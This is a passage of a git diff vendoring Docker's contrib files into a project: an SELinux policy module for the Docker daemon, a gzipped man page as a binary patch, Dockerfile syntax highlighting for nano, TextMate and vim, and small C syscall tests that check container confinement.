pidfile:sock_file write_sock_file_perms; +') +interface(`dev_dontaudit_mounton_sysfs',` + gen_require(` + type sysfs_t; + ') + + dontaudit $1 sysfs_t:dir mounton; +') diff --git a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.te b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.te new file mode 100644 index 0000000000..bad0bb6e4c --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.te @@ -0,0 +1,407 @@ +policy_module(docker, 1.0.0) + +######################################## +# +# Declarations +# + +## +##

+## Determine whether docker can +## connect to all TCP ports. +##

+##
+gen_tunable(docker_connect_any, false) + +type docker_t; +type docker_exec_t; +init_daemon_domain(docker_t, docker_exec_t) +domain_subj_id_change_exemption(docker_t) +domain_role_change_exemption(docker_t) + +type spc_t; +domain_type(spc_t) +role system_r types spc_t; + +type spc_var_run_t; +files_pid_file(spc_var_run_t) + +type docker_var_lib_t; +files_type(docker_var_lib_t) + +type docker_home_t; +userdom_user_home_content(docker_home_t) + +type docker_config_t; +files_config_file(docker_config_t) + +type docker_lock_t; +files_lock_file(docker_lock_t) + +type docker_log_t; +logging_log_file(docker_log_t) + +type docker_tmp_t; +files_tmp_file(docker_tmp_t) + +type docker_tmpfs_t; +files_tmpfs_file(docker_tmpfs_t) + +type docker_var_run_t; +files_pid_file(docker_var_run_t) + +type docker_unit_file_t; +systemd_unit_file(docker_unit_file_t) + +type docker_devpts_t; +term_pty(docker_devpts_t) + +type docker_share_t; +files_type(docker_share_t) + +######################################## +# +# docker local policy +# +allow docker_t self:capability { chown kill fowner fsetid mknod net_admin net_bind_service net_raw setfcap }; +allow docker_t self:tun_socket relabelto; +allow docker_t self:process { getattr signal_perms setrlimit setfscreate }; +allow docker_t self:fifo_file rw_fifo_file_perms; +allow docker_t self:unix_stream_socket create_stream_socket_perms; +allow docker_t self:tcp_socket create_stream_socket_perms; +allow docker_t self:udp_socket create_socket_perms; +allow docker_t self:capability2 block_suspend; + +manage_files_pattern(docker_t, docker_home_t, docker_home_t) +manage_dirs_pattern(docker_t, docker_home_t, docker_home_t) +manage_lnk_files_pattern(docker_t, docker_home_t, docker_home_t) +userdom_admin_home_dir_filetrans(docker_t, docker_home_t, dir, ".docker") + +manage_dirs_pattern(docker_t, docker_config_t, docker_config_t) +manage_files_pattern(docker_t, docker_config_t, docker_config_t) +files_etc_filetrans(docker_t, docker_config_t, dir, 
"docker") + +manage_dirs_pattern(docker_t, docker_lock_t, docker_lock_t) +manage_files_pattern(docker_t, docker_lock_t, docker_lock_t) + +manage_dirs_pattern(docker_t, docker_log_t, docker_log_t) +manage_files_pattern(docker_t, docker_log_t, docker_log_t) +manage_lnk_files_pattern(docker_t, docker_log_t, docker_log_t) +logging_log_filetrans(docker_t, docker_log_t, { dir file lnk_file }) +allow docker_t docker_log_t:dir_file_class_set { relabelfrom relabelto }; + +manage_dirs_pattern(docker_t, docker_tmp_t, docker_tmp_t) +manage_files_pattern(docker_t, docker_tmp_t, docker_tmp_t) +manage_lnk_files_pattern(docker_t, docker_tmp_t, docker_tmp_t) +files_tmp_filetrans(docker_t, docker_tmp_t, { dir file lnk_file }) + +manage_dirs_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) +manage_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) +manage_lnk_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) +manage_fifo_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) +manage_chr_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) +manage_blk_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) +allow docker_t docker_tmpfs_t:dir relabelfrom; +can_exec(docker_t, docker_tmpfs_t) +fs_tmpfs_filetrans(docker_t, docker_tmpfs_t, { dir file }) +allow docker_t docker_tmpfs_t:chr_file mounton; + +manage_dirs_pattern(docker_t, docker_share_t, docker_share_t) +manage_files_pattern(docker_t, docker_share_t, docker_share_t) +manage_lnk_files_pattern(docker_t, docker_share_t, docker_share_t) +allow docker_t docker_share_t:dir_file_class_set { relabelfrom relabelto }; + +can_exec(docker_t, docker_share_t) +#docker_filetrans_named_content(docker_t) + +manage_dirs_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) +manage_chr_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) +manage_blk_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) +manage_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) +manage_lnk_files_pattern(docker_t, 
docker_var_lib_t, docker_var_lib_t) +allow docker_t docker_var_lib_t:dir_file_class_set { relabelfrom relabelto }; +files_var_lib_filetrans(docker_t, docker_var_lib_t, { dir file lnk_file }) + +manage_dirs_pattern(docker_t, docker_var_run_t, docker_var_run_t) +manage_files_pattern(docker_t, docker_var_run_t, docker_var_run_t) +manage_sock_files_pattern(docker_t, docker_var_run_t, docker_var_run_t) +manage_lnk_files_pattern(docker_t, docker_var_run_t, docker_var_run_t) +files_pid_filetrans(docker_t, docker_var_run_t, { dir file lnk_file sock_file }) + +allow docker_t docker_devpts_t:chr_file { relabelfrom rw_chr_file_perms setattr_chr_file_perms }; +term_create_pty(docker_t, docker_devpts_t) + +kernel_read_system_state(docker_t) +kernel_read_network_state(docker_t) +kernel_read_all_sysctls(docker_t) +kernel_rw_net_sysctls(docker_t) +kernel_setsched(docker_t) +kernel_read_all_proc(docker_t) + +domain_use_interactive_fds(docker_t) +domain_dontaudit_read_all_domains_state(docker_t) + +corecmd_exec_bin(docker_t) +corecmd_exec_shell(docker_t) + +corenet_tcp_bind_generic_node(docker_t) +corenet_tcp_sendrecv_generic_if(docker_t) +corenet_tcp_sendrecv_generic_node(docker_t) +corenet_tcp_sendrecv_generic_port(docker_t) +corenet_tcp_bind_all_ports(docker_t) +corenet_tcp_connect_http_port(docker_t) +corenet_tcp_connect_commplex_main_port(docker_t) +corenet_udp_sendrecv_generic_if(docker_t) +corenet_udp_sendrecv_generic_node(docker_t) +corenet_udp_sendrecv_all_ports(docker_t) +corenet_udp_bind_generic_node(docker_t) +corenet_udp_bind_all_ports(docker_t) + +files_read_config_files(docker_t) +files_dontaudit_getattr_all_dirs(docker_t) +files_dontaudit_getattr_all_files(docker_t) + +fs_read_cgroup_files(docker_t) +fs_read_tmpfs_symlinks(docker_t) +fs_search_all(docker_t) +fs_getattr_all_fs(docker_t) + +storage_raw_rw_fixed_disk(docker_t) + +auth_use_nsswitch(docker_t) +auth_dontaudit_getattr_shadow(docker_t) + +init_read_state(docker_t) +init_status(docker_t) + 
+logging_send_audit_msgs(docker_t) +logging_send_syslog_msg(docker_t) + +miscfiles_read_localization(docker_t) + +mount_domtrans(docker_t) + +seutil_read_default_contexts(docker_t) +seutil_read_config(docker_t) + +sysnet_dns_name_resolve(docker_t) +sysnet_exec_ifconfig(docker_t) + +optional_policy(` + rpm_exec(docker_t) + rpm_read_db(docker_t) + rpm_exec(docker_t) +') + +optional_policy(` + fstools_domtrans(docker_t) +') + +optional_policy(` + iptables_domtrans(docker_t) +') + +optional_policy(` + openvswitch_stream_connect(docker_t) +') + +allow docker_t self:capability { dac_override setgid setpcap setuid sys_admin sys_boot sys_chroot sys_ptrace }; + +allow docker_t self:process { getcap setcap setexec setpgid setsched signal_perms }; + +allow docker_t self:netlink_route_socket rw_netlink_socket_perms;; +allow docker_t self:netlink_audit_socket create_netlink_socket_perms; +allow docker_t self:unix_dgram_socket { create_socket_perms sendto }; +allow docker_t self:unix_stream_socket { create_stream_socket_perms connectto }; + +allow docker_t docker_var_lib_t:dir mounton; +allow docker_t docker_var_lib_t:chr_file mounton; +can_exec(docker_t, docker_var_lib_t) + +kernel_dontaudit_setsched(docker_t) +kernel_get_sysvipc_info(docker_t) +kernel_request_load_module(docker_t) +kernel_mounton_messages(docker_t) +kernel_mounton_all_proc(docker_t) +kernel_mounton_all_sysctls(docker_t) +kernel_unlabeled_entry_type(spc_t) +kernel_unlabeled_domtrans(docker_t, spc_t) + +dev_getattr_all(docker_t) +dev_getattr_sysfs_fs(docker_t) +dev_read_urand(docker_t) +dev_read_lvm_control(docker_t) +dev_rw_sysfs(docker_t) +dev_rw_loop_control(docker_t) +dev_rw_lvm_control(docker_t) + +files_getattr_isid_type_dirs(docker_t) +files_manage_isid_type_dirs(docker_t) +files_manage_isid_type_files(docker_t) +files_manage_isid_type_symlinks(docker_t) +files_manage_isid_type_chr_files(docker_t) +files_manage_isid_type_blk_files(docker_t) +files_exec_isid_files(docker_t) +files_mounton_isid(docker_t) 
+files_mounton_non_security(docker_t) +files_mounton_isid_type_chr_file(docker_t) + +fs_mount_all_fs(docker_t) +fs_unmount_all_fs(docker_t) +fs_remount_all_fs(docker_t) +files_mounton_isid(docker_t) +fs_manage_cgroup_dirs(docker_t) +fs_manage_cgroup_files(docker_t) +fs_relabelfrom_xattr_fs(docker_t) +fs_relabelfrom_tmpfs(docker_t) +fs_read_tmpfs_symlinks(docker_t) +fs_list_hugetlbfs(docker_t) + +term_use_generic_ptys(docker_t) +term_use_ptmx(docker_t) +term_getattr_pty_fs(docker_t) +term_relabel_pty_fs(docker_t) +term_mounton_unallocated_ttys(docker_t) + +modutils_domtrans_insmod(docker_t) + +systemd_status_all_unit_files(docker_t) +systemd_start_systemd_services(docker_t) + +userdom_stream_connect(docker_t) +userdom_search_user_home_content(docker_t) +userdom_read_all_users_state(docker_t) +userdom_relabel_user_home_files(docker_t) +userdom_relabel_user_tmp_files(docker_t) +userdom_relabel_user_tmp_dirs(docker_t) + +optional_policy(` + gpm_getattr_gpmctl(docker_t) +') + +optional_policy(` + dbus_system_bus_client(docker_t) + init_dbus_chat(docker_t) + init_start_transient_unit(docker_t) + + optional_policy(` + systemd_dbus_chat_logind(docker_t) + ') + + optional_policy(` + firewalld_dbus_chat(docker_t) + ') +') + +optional_policy(` + udev_read_db(docker_t) +') + +optional_policy(` + virt_read_config(docker_t) + virt_exec(docker_t) + virt_stream_connect(docker_t) + virt_stream_connect_sandbox(docker_t) + virt_exec_sandbox_files(docker_t) + virt_manage_sandbox_files(docker_t) + virt_relabel_sandbox_filesystem(docker_t) + virt_transition_svirt_sandbox(docker_t, system_r) + virt_mounton_sandbox_file(docker_t) +# virt_attach_sandbox_tun_iface(docker_t) + allow docker_t svirt_sandbox_domain:tun_socket relabelfrom; +') + +tunable_policy(`docker_connect_any',` + corenet_tcp_connect_all_ports(docker_t) + corenet_sendrecv_all_packets(docker_t) + corenet_tcp_sendrecv_all_ports(docker_t) +') + +######################################## +# +# spc local policy +# 
+domain_entry_file(spc_t, docker_share_t) +domain_entry_file(spc_t, docker_var_lib_t) +role system_r types spc_t; + +domain_entry_file(spc_t, docker_share_t) +domain_entry_file(spc_t, docker_var_lib_t) +domtrans_pattern(docker_t, docker_share_t, spc_t) +domtrans_pattern(docker_t, docker_var_lib_t, spc_t) +allow docker_t spc_t:process { setsched signal_perms }; +ps_process_pattern(docker_t, spc_t) +allow docker_t spc_t:socket_class_set { relabelto relabelfrom }; + +optional_policy(` + dbus_chat_system_bus(spc_t) +') + +optional_policy(` + unconfined_domain_noaudit(spc_t) +') + +optional_policy(` + unconfined_domain(docker_t) +') + +optional_policy(` + virt_transition_svirt_sandbox(spc_t, system_r) +') + +######################################## +# +# docker upstream policy +# + +optional_policy(` +# domain_stub_named_filetrans_domain() + gen_require(` + attribute named_filetrans_domain; + ') + + docker_filetrans_named_content(named_filetrans_domain) +') + +optional_policy(` + lvm_stub() + docker_rw_sem(lvm_t) +') + +optional_policy(` + staff_stub() + docker_stream_connect(staff_t) + docker_exec(staff_t) +') + +optional_policy(` + virt_stub_svirt_sandbox_domain() + virt_stub_svirt_sandbox_file() + allow svirt_sandbox_domain self:netlink_kobject_uevent_socket create_socket_perms; + docker_read_share_files(svirt_sandbox_domain) + docker_lib_filetrans(svirt_sandbox_domain,svirt_sandbox_file_t, sock_file) + docker_use_ptys(svirt_sandbox_domain) + docker_spc_stream_connect(svirt_sandbox_domain) + fs_list_tmpfs(svirt_sandbox_domain) + fs_rw_hugetlbfs_files(svirt_sandbox_domain) + fs_dontaudit_remount_tmpfs(svirt_sandbox_domain) + dev_dontaudit_mounton_sysfs(svirt_sandbox_domain) + + tunable_policy(`virt_sandbox_use_fusefs',` + fs_manage_fusefs_dirs(svirt_sandbox_domain) + fs_manage_fusefs_files(svirt_sandbox_domain) + fs_manage_fusefs_symlinks(svirt_sandbox_domain) + ') + gen_require(` + attribute domain; + ') + + dontaudit svirt_sandbox_domain domain:key {search link}; 
+') + +optional_policy(` + gen_require(` + type pcp_pmcd_t; + ') + docker_manage_lib_files(pcp_pmcd_t) +') diff --git a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker_selinux.8.gz b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker_selinux.8.gz new file mode 100644 index 0000000000000000000000000000000000000000..ab5d59445ac1601ca378aaa3e71fb9cff43a1592 GIT binary patch literal 2847 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 xb`W`pZ+>}u<]*>" "%[qw]\[[^]]*\]" "%[qw]\$[^$]*\$" "%[qw]\^[^^]*\^" "%[qw]![^!]*!" + +## Strings, double-quoted +color brightwhite ""([^"]|(\\"))*"" "%[QW]?\{[^}]*\}" "%[QW]?\([^)]*\)" "%[QW]?<[^>]*>" "%[QW]?\[[^]]*\]" "%[QW]?\$[^$]*\$" "%[QW]?\^[^^]*\^" "%[QW]?![^!]*!" + +## Single and double quotes +color brightyellow "('|\")" diff --git a/vendor/github.com/docker/docker/contrib/syntax/nano/README.md b/vendor/github.com/docker/docker/contrib/syntax/nano/README.md new file mode 100644 index 0000000000..5985208b09 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/syntax/nano/README.md @@ -0,0 +1,32 @@ +Dockerfile.nanorc +================= + +Dockerfile syntax highlighting for nano + +Single User Installation +------------------------ +1. Create a nano syntax directory in your home directory: + * `mkdir -p ~/.nano/syntax` + +2. Copy `Dockerfile.nanorc` to` ~/.nano/syntax/` + * `cp Dockerfile.nanorc ~/.nano/syntax/` + +3. 
Add the following to your `~/.nanorc` to tell nano where to find the `Dockerfile.nanorc` file + ``` +## Dockerfile files +include "~/.nano/syntax/Dockerfile.nanorc" + ``` + +System Wide Installation +------------------------ +1. Create a nano syntax directory: + * `mkdir /usr/local/share/nano` + +2. Copy `Dockerfile.nanorc` to `/usr/local/share/nano` + * `cp Dockerfile.nanorc /usr/local/share/nano/` + +3. Add the following to your `/etc/nanorc`: + ``` +## Dockerfile files +include "/usr/local/share/nano/Dockerfile.nanorc" + ``` diff --git a/vendor/github.com/docker/docker/contrib/syntax/textmate/Docker.tmbundle/Preferences/Dockerfile.tmPreferences b/vendor/github.com/docker/docker/contrib/syntax/textmate/Docker.tmbundle/Preferences/Dockerfile.tmPreferences new file mode 100644 index 0000000000..20f0d04ca8 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/syntax/textmate/Docker.tmbundle/Preferences/Dockerfile.tmPreferences @@ -0,0 +1,24 @@ + + + + + name + Comments + scope + source.dockerfile + settings + + shellVariables + + + name + TM_COMMENT_START + value + # + + + + uuid + 2B215AC0-A7F3-4090-9FF6-F4842BD56CA7 + + diff --git a/vendor/github.com/docker/docker/contrib/syntax/textmate/Docker.tmbundle/Syntaxes/Dockerfile.tmLanguage b/vendor/github.com/docker/docker/contrib/syntax/textmate/Docker.tmbundle/Syntaxes/Dockerfile.tmLanguage new file mode 100644 index 0000000000..948a9bfc20 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/syntax/textmate/Docker.tmbundle/Syntaxes/Dockerfile.tmLanguage @@ -0,0 +1,143 @@ + + + + + fileTypes + + Dockerfile + + name + Dockerfile + patterns + + + captures + + 1 + + name + keyword.control.dockerfile + + 2 + + name + keyword.other.special-method.dockerfile + + + match + ^\s*(?:(ONBUILD)\s+)?(ADD|ARG|CMD|COPY|ENTRYPOINT|ENV|EXPOSE|FROM|HEALTHCHECK|LABEL|MAINTAINER|RUN|SHELL|STOPSIGNAL|USER|VOLUME|WORKDIR)\s + + + captures + + 1 + + name + keyword.operator.dockerfile + + 2 + + name + 
keyword.other.special-method.dockerfile + + + match + ^\s*(?:(ONBUILD)\s+)?(CMD|ENTRYPOINT)\s + + + begin + " + beginCaptures + + 1 + + name + punctuation.definition.string.begin.dockerfile + + + end + " + endCaptures + + 1 + + name + punctuation.definition.string.end.dockerfile + + + name + string.quoted.double.dockerfile + patterns + + + match + \\. + name + constant.character.escaped.dockerfile + + + + + begin + ' + beginCaptures + + 1 + + name + punctuation.definition.string.begin.dockerfile + + + end + ' + endCaptures + + 1 + + name + punctuation.definition.string.end.dockerfile + + + name + string.quoted.single.dockerfile + patterns + + + match + \\. + name + constant.character.escaped.dockerfile + + + + + captures + + 1 + + name + punctuation.whitespace.comment.leading.dockerfile + + 2 + + name + comment.line.number-sign.dockerfile + + 3 + + name + punctuation.definition.comment.dockerfile + + + comment + comment.line + match + ^(\s*)((#).*$\n?) + + + scopeName + source.dockerfile + uuid + a39d8795-59d2-49af-aa00-fe74ee29576e + + diff --git a/vendor/github.com/docker/docker/contrib/syntax/textmate/Docker.tmbundle/info.plist b/vendor/github.com/docker/docker/contrib/syntax/textmate/Docker.tmbundle/info.plist new file mode 100644 index 0000000000..239f4b0a9b --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/syntax/textmate/Docker.tmbundle/info.plist @@ -0,0 +1,16 @@ + + + + + contactEmailRot13 + germ@andz.com.ar + contactName + GermanDZ + description + Helpers for Docker. + name + Docker + uuid + 8B9DDBAF-E65C-4E12-FFA7-467D4AA535B1 + + diff --git a/vendor/github.com/docker/docker/contrib/syntax/textmate/README.md b/vendor/github.com/docker/docker/contrib/syntax/textmate/README.md new file mode 100644 index 0000000000..ce611018e5 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/syntax/textmate/README.md @@ -0,0 +1,17 @@ +# Docker.tmbundle + +Dockerfile syntax highlighting for TextMate and Sublime Text. 
+ +## Install + +### Sublime Text + +Available for Sublime Text under [package control](https://sublime.wbond.net/packages/Dockerfile%20Syntax%20Highlighting). +Search for *Dockerfile Syntax Highlighting* + +### TextMate 2 + +You can install this bundle in TextMate by opening the preferences and going to the bundles tab. After installation it will be automatically updated for you. + +enjoy. + diff --git a/vendor/github.com/docker/docker/contrib/syntax/textmate/REVIEWERS b/vendor/github.com/docker/docker/contrib/syntax/textmate/REVIEWERS new file mode 100644 index 0000000000..965743df64 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/syntax/textmate/REVIEWERS @@ -0,0 +1 @@ +Asbjorn Enge (@asbjornenge) diff --git a/vendor/github.com/docker/docker/contrib/syntax/vim/LICENSE b/vendor/github.com/docker/docker/contrib/syntax/vim/LICENSE new file mode 100644 index 0000000000..e67cdabd22 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/syntax/vim/LICENSE @@ -0,0 +1,22 @@ +Copyright (c) 2013 Honza Pokorny +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are met: + +1. Redistributions of source code must retain the above copyright + notice, this list of conditions and the following disclaimer. +2. Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND +ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED +WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR +ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; +LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND +ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT +(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS +SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. diff --git a/vendor/github.com/docker/docker/contrib/syntax/vim/README.md b/vendor/github.com/docker/docker/contrib/syntax/vim/README.md new file mode 100644 index 0000000000..5aa9bd825d --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/syntax/vim/README.md @@ -0,0 +1,26 @@ +dockerfile.vim +============== + +Syntax highlighting for Dockerfiles + +Installation +------------ +With [pathogen](https://github.com/tpope/vim-pathogen), the usual way... + +With [Vundle](https://github.com/gmarik/Vundle.vim) + + Plugin 'docker/docker' , {'rtp': '/contrib/syntax/vim/'} + +Features +-------- + +The syntax highlighting includes: + +* The directives (e.g. `FROM`) +* Strings +* Comments + +License +------- + +BSD, short and sweet diff --git a/vendor/github.com/docker/docker/contrib/syntax/vim/doc/dockerfile.txt b/vendor/github.com/docker/docker/contrib/syntax/vim/doc/dockerfile.txt new file mode 100644 index 0000000000..e69e2b7b30 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/syntax/vim/doc/dockerfile.txt @@ -0,0 +1,18 @@ +*dockerfile.txt* Syntax highlighting for Dockerfiles + +Author: Honza Pokorny +License: BSD + +INSTALLATION *installation* + +Drop it on your Pathogen path and you're all set. + +FEATURES *features* + +The syntax highlighting includes: + +* The directives (e.g. 
FROM) +* Strings +* Comments + + vim:tw=78:et:ft=help:norl: diff --git a/vendor/github.com/docker/docker/contrib/syntax/vim/ftdetect/dockerfile.vim b/vendor/github.com/docker/docker/contrib/syntax/vim/ftdetect/dockerfile.vim new file mode 100644 index 0000000000..ee10e5d6a0 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/syntax/vim/ftdetect/dockerfile.vim @@ -0,0 +1 @@ +au BufNewFile,BufRead [Dd]ockerfile,Dockerfile.* set filetype=dockerfile diff --git a/vendor/github.com/docker/docker/contrib/syntax/vim/syntax/dockerfile.vim b/vendor/github.com/docker/docker/contrib/syntax/vim/syntax/dockerfile.vim new file mode 100644 index 0000000000..a067e6ad4c --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/syntax/vim/syntax/dockerfile.vim @@ -0,0 +1,31 @@ +" dockerfile.vim - Syntax highlighting for Dockerfiles +" Maintainer: Honza Pokorny +" Version: 0.5 + + +if exists("b:current_syntax") + finish +endif + +let b:current_syntax = "dockerfile" + +syntax case ignore + +syntax match dockerfileKeyword /\v^\s*(ONBUILD\s+)?(ADD|ARG|CMD|COPY|ENTRYPOINT|ENV|EXPOSE|FROM|HEALTHCHECK|LABEL|MAINTAINER|RUN|SHELL|STOPSIGNAL|USER|VOLUME|WORKDIR)\s/ +highlight link dockerfileKeyword Keyword + +syntax region dockerfileString start=/\v"/ skip=/\v\\./ end=/\v"/ +highlight link dockerfileString String + +syntax match dockerfileComment "\v^\s*#.*$" +highlight link dockerfileComment Comment + +set commentstring=#\ %s + +" match "RUN", "CMD", and "ENTRYPOINT" lines, and parse them as shell +let s:current_syntax = b:current_syntax +unlet b:current_syntax +syntax include @SH syntax/sh.vim +let b:current_syntax = s:current_syntax +syntax region shLine matchgroup=dockerfileKeyword start=/\v^\s*(RUN|CMD|ENTRYPOINT)\s/ end=/\v$/ contains=@SH +" since @SH will handle "\" as part of the same line automatically, this "just works" for line continuation too, but with the caveat that it will highlight "RUN echo '" followed by a newline as if it were a block because the "'" is shell line 
continuation... not sure how to fix that just yet (TODO) diff --git a/vendor/github.com/docker/docker/contrib/syscall-test/Dockerfile b/vendor/github.com/docker/docker/contrib/syscall-test/Dockerfile new file mode 100644 index 0000000000..f95f1758c0 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/syscall-test/Dockerfile @@ -0,0 +1,15 @@ +FROM buildpack-deps:jessie + +COPY . /usr/src/ + +WORKDIR /usr/src/ + +RUN gcc -g -Wall -static userns.c -o /usr/bin/userns-test \ + && gcc -g -Wall -static ns.c -o /usr/bin/ns-test \ + && gcc -g -Wall -static acct.c -o /usr/bin/acct-test \ + && gcc -g -Wall -static setuid.c -o /usr/bin/setuid-test \ + && gcc -g -Wall -static setgid.c -o /usr/bin/setgid-test \ + && gcc -g -Wall -static socket.c -o /usr/bin/socket-test \ + && gcc -g -Wall -static raw.c -o /usr/bin/raw-test + +RUN [ "$(uname -m)" = "x86_64" ] && gcc -s -m32 -nostdlib exit32.s -o /usr/bin/exit32-test || true diff --git a/vendor/github.com/docker/docker/contrib/syscall-test/acct.c b/vendor/github.com/docker/docker/contrib/syscall-test/acct.c new file mode 100644 index 0000000000..88ac287966 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/syscall-test/acct.c @@ -0,0 +1,16 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include + +int main(int argc, char **argv) +{ + int err = acct("/tmp/t"); + if (err == -1) { + fprintf(stderr, "acct failed: %s\n", strerror(errno)); + exit(EXIT_FAILURE); + } + exit(EXIT_SUCCESS); +} diff --git a/vendor/github.com/docker/docker/contrib/syscall-test/exit32.s b/vendor/github.com/docker/docker/contrib/syscall-test/exit32.s new file mode 100644 index 0000000000..8bbb5c58b3 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/syscall-test/exit32.s @@ -0,0 +1,7 @@ +.globl _start +.text +_start: + xorl %eax, 